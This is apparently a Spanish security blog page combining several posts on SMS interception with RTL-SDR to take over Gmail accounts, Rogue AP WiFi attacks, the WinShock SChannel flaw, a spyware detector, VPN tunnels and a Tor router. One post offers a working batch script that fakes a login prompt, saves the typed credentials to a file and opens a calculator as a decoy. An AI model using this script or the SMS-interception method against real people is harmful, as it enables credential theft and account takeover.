Cómo te pueden robar tu Gmail con un ataque RTL-SDR

Estándar
Figura 1: Cómo te pueden robar tu identidad con un ataque RTL-SDR
Entre todas las técnicas para atacar a un usuario con un smartphone, hay una que es curiosamente extremadamente peligrosa. Se trata de robar una identidad por medio de un ataque RTL-SDR de la forma más sencilla, haciendo algo similar a Robar una cuenta de Hotmail o Gmail usando Siri. Os cuento la idea.
He olvidado tu contraseña de Gmail o Hotmail
Si no has tenido precaución de poner un segundo factor de autenticación con Google Authenticator o con cualquier otro sistema para proteger identidades digitales, entonces tu cuenta está protegida solo por la contraseña, o por contraseña más OTPenviado por SMS.
Figura 2: Solicitar la recuperación de contraseña vía código SMS
Esto permite a cualquier atacante intentar quitarte la cuenta cambiando la contraseña de tu identidad siguiendo el formulario de “He olvidado mi contraseña”. Entre los métodos que se pueden solicitar está el de envío de un código temporal de recuperación de cuenta, que se puede enviar vía SMS para que te llegue a teléfono móvil.
Figura 3: Visualización del código de recuperación con la pantalla bloqueada
Si tienes la previsualización de mensajes en el terminal y el atacante tiene alguna posibilidad de acceso físico, se podría ver el código en la ventana bloqueada y robar la cuenta, pero si no… se puede hacer uso de un ataque RTL-SDR.
Capturar el mensaje SMS con RTL-SDR
El ataque RTL-SDR se basa en sintonizar una antena de comunicaciones en la bandaGSM para capturar el tráfico que por ella circula y después descifrarlo con lasrainbow tables que se publicaron para ello. Si el dueño de la identidad que se quiere robar tiene el teléfono encendido y está en la misma zona geográfica, solo sería necesario pedir el envío del código de recuperación de contraseña vía SMS y capturarlo tal y como se explica en este artículo.
Figura 4: Adaptando la señal para capturar canal GSM
A partir de este momento se podría cambiar la contraseña. Una vez cambiada la contraseña, si la persona tuviera puesto un OTP (One-Time Password) basado enSMS, entonces sería necesario seguir capturando los SMS hasta conseguir el OTP y acceder a la cuenta. Y fin.
Figura 5: SMS capturado con WireShark usando RTL-SDR
Este ataque NO se puede hacer en todas las estaciones base ni en todas las operadoras, ya que algunas están desplegando ya nuevos protocolos de cifrado A5/3, pero en las antiguas estaciones base sí, es conveniente poner sistemas Time-Based OTP, Latch o similares para evitar estos ataques. Si quieres saber más de estos ataques, te recomiendo el libro de Hacking de Comunicaciones Móviles.
Anuncios

Culturilla sobre Rogue AP y protocolos WIFI.

Estándar

wifi

La técnica de ataque Rogue AP se basa en la creación de un punto de acceso falso, la idea de la técnica se basa en hacer que el usuario se conecte al punto de acceso falso para redirigir las peticiones a internet realizando un ataque man in the midle. La posibilidad de este ataque puede ser desde la de instalar un proxy inverso que capture todo el tráfico a la de presentar certificados falsos al cliente permitiendo descifrar el tráfico https en el caso que el cliente acepte el certificado mostrado.

Para que el ataque tenga éxito es necesario suplantar al punto de acceso legitimo para ello se pueden realizar diferentes técnicas como son la de realizar las configuraciones iguales al entorno real o la de des autentificar a los clientes conectados con una ataque DOS el punto de acceso real obligando a los usuarios a conectarse al punto de acceso falso. El ataque Rogue RADIUS se basa en la técnica explicada anteriormente además de la de añadir un servidor RADIUS.

Este tipo de ataques son eficientes en entornos Windows  o en terminales móviles ya que simplemente el estar conectado a un punto de acceso u a otro se basa en la calidad e intensidad de la señal y el SSID para asociarse.

Podemos encontrar mas documentacion sobre este tipo de ataques y otros en el libro de Daniel Echeverri “Python para pentesters” en el capitulo IV se detalla  este tipo de ataques y otros  a la red WIFI. TEnemos que tener claro que tipos de protocolos podemos encontrarnos.

Disponemos  de varios protocolos de seguridad para redes inalámbricas. El sistema WEP es un sistema de encriptación implementado en la MAC que no es compatible con IPSec.

El sistema WEP es un sistema débil de seguridad en la actualidad y así lo declaro el IEEE cuando implemento el sistema WPA2 ya que no cumple con los objetivos de seguridad. Aunque el sistema WEP puede ser de 128 y 256 bits en ambos casos es vulnerable ataques.

La seguridad WEP se compone por una clave compartida entre el cliente y el punto de acceso. Todos los datos se cifran con esta clave compartida. Los principales problemas de una clave WEP es que usa un algoritmo RC4 y  los IVS son demasiados cortos. Se pueden hacer uso de herramientas como aircrack para romper la seguridad WEP.

En el año 2003 WEP fue reemplazado por WPA y en 2004 WPA fue mejorado por WPA2.  WPA nació con el objetivo de reparar las ineficiencias de la clave WEP pero al poco tiempo se creó WPA2 que se forjo a partir del WPA y corrige las vulnerabilidades del anterior. Principalmente las diferencias entre WPA y WPA2 son el cifrado de las comunicaciones ya que WPA se basa en TKIP y WPA2 se basa en CCMP. La diferencia es que un cifrado está basado en RC4 y el otro en AES un sistema más fuerte y robusto. También tenemos que tener en cuenta que WPA2 incorpora una versión mejorada de MIC.

En cuanto al protocolo de seguridad WPA2 podemos toparnos con dos modos de funcionamiento. WPA2-ENTERPRISE O WPA2-PSK. En el caso de WPA2-Enterprise está basado en el protocolo 802.1x mientras que  WPA2-PSK está pensado para entornos personales en los cuales se hace uso de una clave.

También disponemos del sistema 802.11x el cual es encapsular los protocolos de autenticación sobre protocolos de capa 2. Para ello hace uso del modo de autenticación EAP, EAP-TLS, EAP-TTLS. Principalmente la diferencia entre ambos es que en EAP-TLS se hace uso de certificados digitales del tipo X.509 y  EAP-TTLS añade características de seguridad sobre EAP-TLS.

Es importante realizar una correcta configuración de la red wifi para no tener sorpresas en la red podemos encontrar programas que monitorizan este tipo de conexiones.

Referencias.

Super-cutre script para hacerse un keylogger en batch

Estándar

Algo cutre pero muy apañao… y seguro que más de uno se dará un gustazo con el batch… Xd

Se trata de un script para hacerse un keylogger *muy* básico. Simplemente crea el directorio c:\Logs y luego lanza el fichero Logger.bat con el siguiente código:

@echo off
color a
title Login
cls
echo Introduce usuario y password para poder ejecutar el programa:
echo.
echo.
cd "C:\Logs"
set /p user=Username:
set /p pass=Password:
echo Username="%user%" Password="%pass%" >> Log.txt
start calc.exe
exit

Enjoy!

Fuente: http://www.latesthackingnews.com/2014/04/09/how-to-create-a-keylogger-in-notepad/

Detekt: ¿Hay alguien espiándome en mi ordenador?

Estándar
Ya hace mucho tiempo que salieron a la luz pública casos de espionaje de gobiernos a ciudadanos por medio de software especialmente creado para espionaje gubernamental. Ahora Amnistía Internacional, Electronic Frontier Foundation y otras organizaciones pro-derechos civiles ha lanzado Detekt, una herramienta creada por Claudio Guarnieri para ayudar a encontrar software de espionaje utilizado en equipos de personales.

Figura 1: ¿Hay alguien espiándome en mi ordenador?

Continuar leyendo

Grave RCE en SChannel de Windows aka #WinShock

Estándar

Hace unos días en Pastebin avisaban de que, si el viernes 14 de noviembre Micro$oft no categorizaba la vulnerabilidad MS14-066 / CVE-2014-6321 como un 0-day, se iba a publicar el exploit del llamado #WinShock o “SChannel Shenanigans”, una vulnerabilidad grave que:

– puede explotarse antes de cualquier autenticación, en métodos que se llaman al principio por muchas, muchas aplicaciones, bibliotecas y servicios.
– siempre acaba con los privilegios de SYSTEM, de forma local o remota. Un exploit para “Modo Dios” con 100% de éxito.
– puede utilizarse de varias maneras y el código defectuoso está muy expuesto. Todo, incluyendo Windows 2000 en adelante es vulnerable.
– el código heredado se ejecuta siempre. Esto significa que las protecciones modernas como EMET no funcionan.

Concretamente el problema vuelve estar en la implementación de SSL y TLS, esta vez por Microsoft que lo hace mediante Secure Channel, también conocido como Schannel, que permite la ejecución remota de código al procesar paquetes especialmente modificados.
Finalmente la vulnerabilidad fue clasificada con una criticidad de 10.0 en la escala CVSS (CVE-2014-6321) y Microsoft tuvo que publicar un workaround y una actualización crítica para solucionarlo pero, ¿parchearán todos los sistemas Windows antes de ser atacados?… es una pregunta retórica… *muac* *muac* ^_^

Go, go, empieza la carrera… podéis encontrar un gran detalle técnico en la entrada delblog BeyondTrust y, como dice el autor, “se deja como ejercicio para el lector un análisis más detallado y la explotación” 😉

pd. Impacientes, ya tenéis una PoC de Immunity Inc para Canvas

Nuestro servidor de túneles siempre online (3ª Parte) icmp-tunnel y VPN PPTP

Estándar
Siguiendo con esta serie de entradas hoy veremos una técnica más que hay que conocer (indispensable) y empezaremos con el tema de las VPNs… Creo que todo el mundo sabe que es una VPN pero por si acaso, vamos a refrescar conceptos (tirando de Wikipedia):

Una red privada virtual, RPV, o VPN de las siglas en inglés de Virtual Private Network, es una tecnología de red que permite una extensión “segura” de la red local (LAN) sobre una red pública o no controlada como Internet. Permite que la computadora en la red envíe y reciba datos sobre redes compartidas o públicas como si fuera una red privada con toda la funcionalidad, seguridad y políticas de gestión de una red privada. Esto se realiza estableciendo una conexión virtual punto a punto mediante el uso de conexiones dedicadas, cifrado o la combinación de ambos métodos.

Continuar leyendo

anonabox: un mini-router para acceder a Tor

Estándar

Recientemente se ha creado una campaña de Kickstarter para Anonabox, un interesante router-hardware con software de código abierto queredirige automáticamente todo el tráfico mediante Ethernet o Wifi a través de la red Tor, ocultando la dirección IP del usuario y evitando la censura.

Pero lo que más llama la atención es su ajustado precio (vale unos 45 dólares) y que es tan pequeño como un paquete de cigarrillos, lo que permitirá al usuario llevarlo siempre encima y por ejemplo conectarlo a un cable ethernet de la oficina para hacer un trabajo sensible o en un cibercafé en China para evadir el Gran Firewall.

No es el primer proyecto que intenta integrar Tor directamente en un router, pero si quizás el que mejor equilibrio tiene entre precio, fácil configuración, tamaño y seguridad. “para nosotros era importante que fuera portátil y pequeño para que se pueda ocultar con facilidad o incluso tirar de inmediato si hay que deshacerse de él.” comenta Germar, uno de los consultores de TI independientes que pasaron los últimos cuatro años desarrollando el Anonabox.

No obstante recordar que Anonabox o cualquier elemento que facilite el acceso a Tor no protege totalmente la privacidad del usuario. Si utiliza el mismo navegador para sus actividades de Internet anónimas y normales, por ejemplo, los sitios web pueden utilizar técnicas de “fingerprinting” en el navegador como cookies para identificarle. Por no hablar de la ejecución de algún exploit e instalación de malware que pueda comprometer la máquina del usuario…

Fuente: http://www.wired.com/2014/10/tiny-box-can-anonymize-everything-online
Crowdfunding: https://www.kickstarter.com/projects/augustgermar/anonabox-a-tor-hardware-router